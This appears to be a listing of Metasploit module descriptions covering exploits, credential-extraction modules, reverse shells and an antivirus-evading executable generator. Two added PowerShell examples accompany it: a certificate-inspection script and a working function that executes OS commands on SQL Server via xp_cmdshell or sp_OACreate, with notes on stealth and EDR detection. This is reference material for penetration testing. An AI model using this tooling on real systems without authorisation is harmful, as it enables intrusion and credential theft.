Microsoft Windows Defender Evasive Executable
This module allows you to generate a Windows EXE that evades Microsoft Windows Defender. Multiple techniques such as shellcode encryption, source code obfuscation, Metasm, and anti-emulation are used to achieve this. For best results, please try to use payloads that use a more secure...
WordPress Responsive Thumbnail Slider Arbitrary File Upload
This module exploits an arbitrary file upload vulnerability in the Responsive Thumbnail Slider plugin v1.0 for WordPress (post-authentication). This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
Mac OS X APFS Encrypted Volume Password Disclosure
This module exploits a flaw in OSX 10.13 through 10.13.3 that discloses the passwords of encrypted APFS volumes. In OSX a normal user can use the 'log' command to view the system logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS volume the password is visible in plaintext within...
NIS ypserv Map Dumper
This module dumps the specified map from NIS ypserv. The following examples are from ypcat -x: Use "ethers" for map "ethers.byname" Use "aliases" for map "mail.aliases" Use "services" for map "services.byname" Use "protocols" for map "protocols.bynumber" Use "hosts" for map "hosts.byname" Use...
Unix Command Shell, Bind TCP (stub)
Listen for a connection and spawn a command shell (stub only, no payload).
Linux Command Shell, Reverse TCP Inline
Connect back to the attacker and spawn a command shell (Linux AArch64 inline payload).
Linux Meterpreter, Reverse HTTPS Inline
Run the Meterpreter / Mettle server payload (stageless).
RF Transceiver Transmitter
This module powers an HWBridge-connected radio transceiver, effectively transmitting on the frequency set by the FREQ option. NOTE: Users of this module should be aware of their local laws, regulations, and licensing requirements for transmitting on any given radio frequency.
WordPress Ninja Forms Unauthenticated File Upload
Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.
Zabbix toggle_ids SQL Injection
This module exploits a SQL injection in Zabbix 3.0.3 and likely prior in order to save the current usernames and password hashes from the database to a JSON file.
Magento 2.0.6 Unserialize Remote Code Execution
This module exploits a PHP object injection vulnerability in Magento 2.0.6 or prior.
Chinese Caidao Backdoor Bruteforce
This module attempts to brute-force Chinese Caidao ASP/PHP/ASPX backdoors.
Post Windows Gather NTDS.DIT Location
This module will find the location of the NTDS.DIT file from the Registry, check that it exists, and display its location on the screen, which is useful if you wish to manually acquire the file using ntdsutil or VSS.
Write Messages to Users
This module uses the wall(1) or write(1) utility, as appropriate, to send messages to users on the target system.
Send Cisco Discovery Protocol (CDP) Packets
This module sends Cisco Discovery Protocol (CDP) packets. Note that any responses to the CDP packets broadcast from this module will need to be analyzed with an external packet analysis tool, such as tcpdump or Wireshark, in order to learn more about the Cisco switch and router environment.
Oracle Event Processing FileUploadServlet Arbitrary File Upload
This module exploits an arbitrary file upload vulnerability in Oracle Event Processing 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be abused to upload a malicious file onto an arbitrary location due to a directory traversal flaw, and compromise the server. B...
Supermicro Onboard IPMI Port 49152 Sensitive File Exposure
This module abuses a file exposure vulnerability accessible through the web interface on port 49152 of Supermicro Onboard IPMI controllers. The vulnerability allows an attacker to obtain detailed device information and download data files containing the clear-text usernames and passwords for the...
Netopia 3347 Cable Modem Wifi Enumeration
This module extracts WEP keys and WPA pre-shared keys from certain Netopia cable modems.
JIRA Issues Collector Directory Traversal
This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists in the issues collector code, while handling attachments provided by the user. It can be exploited in Windows environments to get remote code execution. This module has been tested successfully on JIRA 6.0.3...
Katello (Red Hat Satellite) users/update_roles Missing Authorization
This module exploits a missing authorization vulnerability in the "update_roles" action of the "users" controller of Katello and Red Hat Satellite (Katello 1.5.0-14 and earlier) by changing the specified account to an administrator account.
Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow
This module exploits a stack-based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability exists in the service BKBCopyD.exe when handling specially crafted packets. This module has been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.
Windows Enumerate LSA Secrets
This module will attempt to enumerate the LSA Secrets keys within the registry. The registry key used is HKEY_LOCAL_MACHINE\Security\Policy\Secrets\. Thanks go to Maurizio Agazzini and Mubix for the decrypt code from cachedump.
GE Proficy Cimplicity WebView substitute.bcl Directory Traversal
This module abuses a directory traversal in GE Proficy Cimplicity, specifically in the gefebt.exe component used by WebView, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.
Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
Inject the Meterpreter server DLL via the Reflective DLL Injection payload (staged). Requires Windows XP SP2 or newer. Tunnels communication over HTTPS (HTTP over SSL) with custom proxy support.
Java Applet ProviderSkeleton Insecure Invoke Method
This module abuses the insecure invoke method of the ProviderSkeleton class, which allows calling arbitrary static methods with user-supplied arguments. The vulnerability affects Java version 7u21 and earlier.
Unix Command Shell, Bind TCP (via Zsh)
Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.
Canon Wireless Printer Denial Of Service
The HTTP management interface on several models of Canon wireless printers allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note: if this module is successful, the device can only be recovered with a physical power cycle.
D-Link DIR 645 Password Extractor
This module exploits an authentication bypass vulnerability in the D-Link DIR 645 to extract its stored passwords. Author: Roberto Paleari. References: OSVDB 90733, BID 58231, Packet Storm 120591.
Windows Gather TortoiseSVN Saved Password Extraction
This module extracts and decrypts saved TortoiseSVN passwords. In order for decryption to be successful this module must be executed under the same privileges as the user who originally encrypted the password.
Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16
This module exploits a buffer overflow in Sielco Sistemi Winlog 2.07.14 through 2.07.16. Author: Michael Messner. References: BID 53811, CVE-2012-3815.
RuggedCom Telnet Password Generator
This module will calculate the password for the hard-coded hidden username "factory" in the RuggedCom Rugged Operating System (ROS). The password is dynamically generated based on the device's MAC address.
HP Data Protector 6.1 EXEC_CMD Command Execution
This module exploits HP Data Protector's omniinet process, specifically against a Windows setup. When an EXEC_CMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW. If the file is found, the process will then go ahead and execute it with...
Windows Gather SmartFTP Saved Password Extraction
This module finds saved login credentials for the SmartFTP FTP client for Windows. It finds the saved passwords and decrypts them.
2Wire Cross-Site Request Forgery Password Reset Vulnerability
This module will reset the admin password on a 2Wire wireless router. This is done by using the /xslt page, where authentication is not required, thus allowing configuration changes such as resetting the password as administrator.
Custom Payload
Use a custom string or file as the payload. Set either PAYLOADFILE or PAYLOADSTR.
Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)
This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered by binaryhouse.net.
Sielco Sistemi Winlog Buffer Overflow
This module exploits a buffer overflow in Sielco Sistemi Winlog. Authors: Luigi Auriemma, MC. References: CVE-2011-0517, OSVDB 70418.
DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 Build 6.1.8.10. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
Apple Airport Extreme Password Extraction (WDBRPC)
This module can be used to read the stored password of a vulnerable Apple Airport Extreme access point. Only a small number of firmware versions have the WDBRPC service running, however the factory configuration was vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are...
Windows Executable Download and Execute (via .vbs)
Download an EXE from an HTTPS URL and execute it.
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
This module exploits a buffer overflow vulnerability in the LoadAniIcon function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a...
TWiki Search Function Arbitrary Command Execution
This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands.
Computer Associates License Server GETCONFIG Overflow
This module exploits a vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet, the stack may be overwritten.
HTTP SSL Certificate Information
Parse the server SSL certificate to obtain the common name and signature algorithm...
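An added PowerShell example (not the Metasploit auxiliary module) of the same check done with .NET's SslStream: it accepts whatever certificate the server presents, purely so it can be inspected, then reports the common name, SANs and signature algorithm and flags weak, self-signed or expired certificates. The target host target.example is an assumption.

```powershell
# Added example, not the Metasploit auxiliary module. Connects with TLS,
# deliberately accepts any certificate (we are inspecting it, not trusting it),
# and reports the fields an auditor cares about. target.example is a placeholder.
function Get-ServerCertInfo {
    param([string]$HostName, [int]$Port = 443)

    $tcp = New-Object System.Net.Sockets.TcpClient($HostName, $Port)
    # Accept-all validator: only acceptable here because nothing is sent over the
    # session; never reuse this in code that actually talks to the server.
    $acceptAll = { param($sender, $cert, $chain, $errors) $true } -as [System.Net.Security.RemoteCertificateValidationCallback]
    $ssl = New-Object System.Net.Security.SslStream($tcp.GetStream(), $false, $acceptAll)
    try {
        $ssl.AuthenticateAsClient($HostName)        # $HostName is also sent as SNI
        $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($ssl.RemoteCertificate)
    } finally {
        $ssl.Dispose(); $tcp.Dispose()
    }

    $cn  = $cert.GetNameInfo([System.Security.Cryptography.X509Certificates.X509NameType]::SimpleName, $false)
    $san = $cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.17' } | ForEach-Object { $_.Format($false) }
    $sig = $cert.SignatureAlgorithm.FriendlyName    # e.g. sha256RSA, sha1RSA, md5RSA

    [pscustomobject]@{
        Host           = "${HostName}:$Port"
        CommonName     = $cn
        SubjectAltName = $san
        Issuer         = $cert.Issuer
        SelfSigned     = ($cert.Subject -eq $cert.Issuer)
        SignatureAlg   = $sig
        WeakSignature  = ($sig -match '^(md5|sha1)')  # sha256RSA etc. do not match
        PublicKeyAlg   = $cert.PublicKey.Oid.FriendlyName
        NotAfter       = $cert.NotAfter
        Expired        = ($cert.NotAfter -lt (Get-Date))
        Thumbprint     = $cert.Thumbprint
    }
}

Get-ServerCertInfo -HostName 'target.example' -Port 443
```

Browsers match the name against the SAN extension and ignore the CN when a SAN is present, so report both: a certificate with a correct CN and no SAN still fails modern clients.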
BASE base_qry_common Remote File Include
This module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier.
Microsoft SQL Server Command Execution
This module will execute a Windows command on a MSSQL/MSDE instance via xp_cmdshell (the default) or via the sp_oacreate procedure (more OPSEC-safe: no output, no temporary data table). A valid username and password are required to use this module.
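Both execution paths side by side, as an added PowerShell example that is not the Metasploit module's code: the xp_cmdshell path streams the command's output back as rows, while the sp_OACreate/sp_OAMethod path launches the command through WScript.Shell and returns nothing but an HRESULT, which is the "no output, no temporary data table" property the description mentions. The server name, credentials and the Invoke-MssqlOsCommand/Enable-MssqlOption function names are assumptions; the T-SQL procedures and configuration option names are the real ones.

```powershell
# Added example, not the Metasploit module's code. Runs an OS command on a
# SQL Server through either xp_cmdshell (output returned as rows) or
# sp_OACreate/sp_OAMethod (no result set, no temp table). Both need sysadmin.
# Server, user and password values below are placeholders.
function Enable-MssqlOption {
    param([System.Data.SqlClient.SqlConnection]$Conn, [string]$Name)
    $cmd = $Conn.CreateCommand()
    $cmd.CommandText = "SELECT CAST(value_in_use AS INT) FROM sys.configurations WHERE name = '$Name'"
    if ([int]$cmd.ExecuteScalar() -eq 1) { return }   # already on; sp_configure changes are audited, so skip
    $cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure '$Name', 1; RECONFIGURE;"
    [void]$cmd.ExecuteNonQuery()
}

function Invoke-MssqlOsCommand {
    param(
        [string]$Server, [string]$User, [string]$Password, [string]$Command,
        [ValidateSet('xp_cmdshell', 'sp_oacreate')][string]$Method = 'xp_cmdshell'
    )
    $cs   = "Server=$Server;Database=master;User ID=$User;Password=$Password;Encrypt=True;TrustServerCertificate=True"
    $conn = New-Object System.Data.SqlClient.SqlConnection($cs)
    $conn.Open()
    try {
        $esc = $Command -replace "'", "''"             # keep the command a single T-SQL literal
        $cmd = $conn.CreateCommand()
        if ($Method -eq 'xp_cmdshell') {
            Enable-MssqlOption $conn 'xp_cmdshell'
            $cmd.CommandText = "EXEC master..xp_cmdshell '$esc'"
            $rdr = $cmd.ExecuteReader()
            while ($rdr.Read()) { if (-not $rdr.IsDBNull(0)) { $rdr.GetString(0) } }
            $rdr.Close()
        } else {
            Enable-MssqlOption $conn 'Ole Automation Procedures'
            # WScript.Shell.Run(cmd, 0 = hidden window, 1 = wait for exit). Nothing is
            # returned to the client; redirect inside $Command if output is needed.
            $cmd.CommandText = @"
DECLARE @sh INT, @hr INT;
EXEC @hr = sp_OACreate 'WScript.Shell', @sh OUTPUT;
IF @hr = 0 EXEC @hr = sp_OAMethod @sh, 'Run', NULL, 'cmd.exe /c $esc', 0, 1;
IF @sh IS NOT NULL EXEC sp_OADestroy @sh;
SELECT @hr AS hresult;
"@
            $hr = [int]$cmd.ExecuteScalar()
            if ($hr -ne 0) { throw ('sp_OA* call failed, HRESULT 0x{0:X8}' -f $hr) }
        }
    } finally { $conn.Close() }
}

# Usage (placeholders): output comes back only on the xp_cmdshell path.
Invoke-MssqlOsCommand -Server 'sqlhost' -User 'sa' -Password 'Passw0rd!' -Command 'whoami'
Invoke-MssqlOsCommand -Server 'sqlhost' -User 'sa' -Password 'Passw0rd!' `
    -Command 'whoami > C:\Windows\Temp\w.txt' -Method sp_oacreate
```

Neither path is silent: enabling xp_cmdshell or Ole Automation Procedures through sp_configure is itself logged, and the child process (cmd.exe under sqlservr.exe) is what EDR rules key on, so the sp_OACreate route only avoids the result set and the temp table, not process-creation telemetry.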
Realtek Media Player Playlist Buffer Overflow
This module exploits a stack buffer overflow in Realtek Media Player (RtlRack) A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code.
Windows Command Shell, Bind TCP (via Ruby)
Continually listen for a connection and spawn a command shell via Ruby.
EMC AlphaStor Library Manager Arbitrary Command Execution
EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.
DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
This module exploits a stack buffer overflow in the authentication mechanism of NSI DoubleTake, which is also rebranded as HP StorageWorks. This vulnerability was found by Titon of Bastard Labs.